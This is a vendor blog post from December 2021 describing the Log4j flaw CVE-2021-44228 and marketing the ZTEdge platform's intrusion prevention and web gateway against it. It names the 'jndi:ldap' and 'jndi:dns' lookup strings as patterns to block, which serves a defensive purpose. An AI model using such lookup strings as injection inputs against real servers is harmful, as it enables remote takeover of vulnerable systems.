Posted on December 14, 2021
Want to interview JP?Contact
CVE-2021-44228 is an easily exploited vulnerability in a Java-based library known as Apache Log4j 2 that allows developers of internet services or internet-connected products to log data in their app, including data that users provide. In the case of this specific vulnerability, cybercriminals can access a lookup mechanism in the software that can then be manipulated to give them full server control.
Every company that provides internet services or products that are internet-connected is at risk from this flaw. Hackers can get into their systems and once in, gather data or even steal money. And cybercriminals are seizing the opportunity: Since the vulnerability was revealed, hackers have been actively scanning the internet to find vulnerable instances of Log4j that they can exploit – and the numbers are growing by the hour.
At the time of this writing, Apache has issued a second patch to fix the vulnerability, after a bypass was discovered for the initial patch. But since this vulnerability affects countless numbers of applications that are widely used for business and by individual users, it is likely to remain active and unpatched in at least some systems for a long while.
For users of exploited applications, the news is grim: Once a server of an internet service has been exploited, any user data that is on those companies’ server may be exposed. And virtually all use services that have been exploited or still remain at risk of being attacked.
Given its impact on all organizations running Java workloads, Log4j is a particularly concerning vulnerability that can be easily exploited around the globe to do a great deal of damage. Fortunately, ZTEdge, Ericom Software’s cloud-based SASE platform, provides organizations with several crucial defenses against the Log4j exploits.
The ZTEdge platform’s core Intrusion Prevention System (IPS) actively monitors all traffic flows from user to application for patterns that match malicious intent – behaviors and interactions that, as in this case, might include a hacker scanning the internet to find vulnerable instances of Log4j or attempting to set a malicious Java class string on an LDAP server, or attempting to move laterally once inside of an organization’s network in search of applications using Log4j.
When a potentially malicious event is detected, ZTEdge stops the exploit in its tracks. Alerts may be issued and details about the attempt, including when it occurred, the user involved and where they were located are all recorded for further investigation. Since the monitoring is provided as a cloud service, organizations that use ZTEdge are protected without any patching or updating.
ZTEdge engines are continually and automatically updated to ensure they detect the very latest attack patterns. In fact, the ZTEdge security update for the Log4j vulnerability was available in the system within hours of the exploit being published to the world.
ZTEdge users also benefit from the platform’s defense in depth capabilities, whereby multiple security controls are in place at different levels to mitigate against attacks. In the case of CVE-2021-44228, besides the IPS protections discussed, ZTEdge Web’s secure web (SWG) gateway can help prevent this vulnerability from being exploited. So, for instance, ZTEdge’s SWG application policies can be set to block “jndi:ldap” and “jndi:dns” user agents, thereby preventing attacks attempting to leverage the Log4j vulnerability.
Our team, and the ZTEdge platform itself, will continue to monitor and deploy CVE-specific security rules based on new attack variants for all of our customers. For customers looking for additional support, or if you are looking for protection from CVE-2021-44228, please contact us.
In a recent report, ransomware and BECs take the prize as most-favored types of cyberattacks. A flourishing ransomware-as-a-service market makes attacks easier than ever, and offers a large menu of encryption options.
The recently exposed Microsoft Teams GIFShell technique demonstrates why Zero Trust protection for app surfaces is essential for even the most trusted enterprise apps.
In recently reported Adversary-in-the-Middle attacks, hackers bypass MFA by using session cookies that they illicitly extract from HTTPs requests, via reverse proxies.